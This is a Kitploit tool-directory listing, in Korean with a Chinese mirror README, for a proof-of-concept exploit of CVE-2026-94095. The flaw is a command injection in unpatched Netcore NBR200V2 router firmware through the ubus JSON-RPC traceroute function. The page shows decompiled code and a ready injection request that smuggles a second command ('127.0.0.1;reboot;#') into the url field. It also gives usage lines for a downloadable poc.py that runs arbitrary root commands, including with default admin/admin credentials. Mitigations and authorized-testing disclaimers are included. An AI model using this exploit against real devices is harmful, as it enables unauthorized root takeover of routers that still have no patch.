Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-94095 — CVE-2026-94095에 대한 PoC로, ubus JSON-RPC를 통해 Netcore NBR200V2 펌웨어에서 traceroute 명령어 인젝션이 가능하며, 권한이 부여된 테스트를 위한 root RCE를 활성화합니다. | Kitploit
도구/GitHubGitHub/hackspeak/cve-2026-94095
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingHardware & IoT SecurityPapers & Research
GitHubhackspeak/cve-2026-94095

CVE-2026-94095

CVE-2026-94095에 대한 PoC로, ubus JSON-RPC를 통해 Netcore NBR200V2 펌웨어에서 traceroute 명령어 인젝션이 가능하며, 권한이 부여된 테스트를 위한 root RCE를 활성화합니다.

저장소 보기
17시간 27분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Netcore NBR200V2 - Traceroute 진단 기능의 원격 명령 주입 (CVE-2026-94095)

필드값
제조사Netcore
모델NBR200V2
펌웨어 버전V1.3.241127.071246
영향받는 구성 요소/usr/bin/network_tools
취약점 유형OS 명령 주입 (CWE-74 / CWE-77)
CVSS 3.19.9 (Critical)
공격 벡터원격 (ubus JSON-RPC)
전제 조건접근 가능한 ubus 엔드포인트 + 저권한 세션 (sid)
제조사 상태조기에 연락했으나 응답 없음, 공개 시점에 패치 없음

설명

Netcore NBR200V2 펌웨어 V1.3.241127.071246에는 traceroute 진단 기능에 원격 명령 주입 취약점이 존재합니다. traceroute 핸들러는 ubus JSON-RPC로부터 공격자가 제어하는 url 값을 받아들여 이를 셸 명령에 연결하고, 그 결과 명령을 실행합니다. 원격 공격자는 이 결함을 이용해 임의의 셸 명령을 실행하거나, 장치를 재부팅하거나, 완전한 시스템 장악을 달성할 수 있습니다.

취약점 체인

원격 요청은 ubus JSON-RPC로 수신됩니다:

root@kitploit:~
POST /ubus {"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"<attacker-controlled>","max_hop":1,"wanid":0}]}

ubus 메서드 매핑은 요청을 sub_401BD8로 라우팅합니다:

root@kitploit:~
object.name = "network_tools"; object.methods = 0x412f4c; "tools_traceroute" -> sub_401BD8

sub_401BD8은 JSON-RPC 데이터를 파싱하여 tools_traceroute()로 전달합니다:

root@kitploit:~
blobmsg_parse(&off_412FA4, 4, &v21, a5 + 4, (v6 & 0xFFFFFF) - 4);
...
v25[0] = v18;              // action
v25[1] = v7;               // url
v25[2] = _bswapsi2(*v8);   // max_hop
...
result = tools_traceroute((int)v25);

tools_traceroute()는 신뢰할 수 없는 url 값을 사용하여 셸 명령을 구성합니다:

root@kitploit:~
snprintf(
    v4, 0x100u,
    "(traceroute %s -m %d > %s && echo \"traceroute ending\" >> %s; touch %s)&",
    v2, *(_DWORD *)(a1 + 8), "/tmp/traceroute.txt", "/tmp/traceroute.txt", "/tmp/.tracroute_end");
system(v4);

이 취약점은 ping 문제와 구조적으로 동일하지만, 다른 싱크와 실행 경로에 도달합니다. system()이 사용되므로 ;, &&, 셸 주석과 같은 명령 구분자가 적용됩니다. 따라서 진단 기능은 범용 명령 실행 프리미티브가 됩니다.

개념 증명

root@kitploit:~
POST /ubus
Content-Type: application/json

{"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"127.0.0.1;reboot;#","max_hop":1}]}

예상 효과: 라우터가 traceroute 작업을 처리하는 동안 reboot를 실행합니다. reboot 대신 임의의 셸 명령을 대체할 수 있습니다.

관련 취약점 (동일 배치)

  • CVE-2026-94096 — LAN IP 구성 경로 (동일 바이너리, 동일 패턴).
  • CVE-2026-94097 — CGI 진단 엔드포인트 (CVSS 10.0).

세 가지 모두 동일한 /usr/bin/network_tools에 도달합니다. 이 바이너리의 진단 함수들은 동일한 안전하지 않은 패턴을 공유하므로, 단일 진입점만 수정하는 것으로는 충분하지 않습니다.

완화 방안

공개 시점에 제조사 패치가 없습니다. 임시 완화 조치:

  1. 관리 인터페이스를 신뢰할 수 없는 네트워크에 노출하지 말고, 모든 WAN 측 관리 매핑을 제거하십시오;
  2. 기본 자격 증명을 변경하고 강력하고 주기적으로 교체되는 비밀번호를 적용하십시오 (ubus 인증이 이 공격의 전제 조건입니다);
  3. 방화벽을 통해 ubus / 관리 엔드포인트를 전용 운영 서브넷으로 제한하십시오;
  4. 제조사 펌웨어 업데이트를 추적하고 CVE-2026-94095/94096/94097에 대한 수정 사항을 함께 확인하십시오.

크레딧

기술 분석 문서를 공개하고 제조사와 (성공하지 못한 채) 조율한 독립 연구자에 의해 공개되었습니다.


分发镜像说明(中文)

本仓库为 CVE-2026-94095(Netcore NBR200V2 traceroute 命令注入) 漏洞 PoC 的中转分发镜像(英文技术披露见上方 CVE-2026-94095.md)。内容依据公开披露文档整理,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / Vulnerability Summary

  • CVE-2026-94095(同批:CVE-2026-94096 / CVE-2026-94097)
  • 影响产品:Netcore NBR200V2 企业路由器,固件 V1.3.241127.071246
  • 受影响组件:/usr/bin/network_tools(traceroute 诊断功能)
  • 类型:OS 命令注入(CWE-74 / CWE-77)
  • CVSS 3.1:9.9(Critical);CVSS 4.0:8.6;CVSS 2.0:9.0
  • 攻击面:ubus JSON-RPC 端点(POST /ubus)
  • 前置条件:可访问 ubus 接口 + 一个低权限会话(sid);弱口令/默认口令会显著降低门槛
  • 修复状态:披露者提前联系厂商,厂商零回应,暂无官方补丁

核心原理:tools_traceroute() 用 snprintf 把攻击者可控的 url 参数拼进 shell 命令,再交给 system() 执行;url 未做任何过滤/转义,分号 ;、&&、管道、注释符 # 均有效——诊断功能因此变成通用命令执行原语。

目录结构 / Layout

root@kitploit:~
CVE-2026-94095.md   —— 公开披露整理(调用链、反编译片段、PoC 请求)
poc.py              —— 可用 PoC 脚本(ubus JSON-RPC 注入,纯标准库)

环境与用法 / Requirements & Usage

  • 目标:未修复的 Netcore NBR200V2(实验室设备);需可访问 POST /ubus 与一个有效 sid
  • 依赖:Python 3(纯标准库,零第三方依赖)
root@kitploit:~
# 已有 sid:
python3 poc.py --target http://192.168.1.1 --sid <SESSION_ID> --cmd "id"

# 用账号口令获取 sid(弱口令/默认口令场景):
python3 poc.py --target http://192.168.1.1 --user admin --password admin --cmd "reboot"

⚠️ 命令会被拼接为 127.0.0.1;<命令>;# 注入 url 参数;reboot 会直接重启设备,请仅在授权/可销毁环境测试。

免责声明 / Disclaimer

本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的设备运行。利用会以设备最高权限执行任意命令(默认运行于 root 上下文),请在可销毁的实验室环境中测试。

归属与许可 / Attribution & License

  • 漏洞由独立研究者公开披露并整理利用链;本仓库为其公开材料的镜像与 PoC 实现。
  • 分发仓库采用 MIT License(见 LICENSE)。

参考链接 / References

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-94095
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-94095
  • 第三方分析(VulDB):https://vuldb.com/vuln/408024
도구 다운로드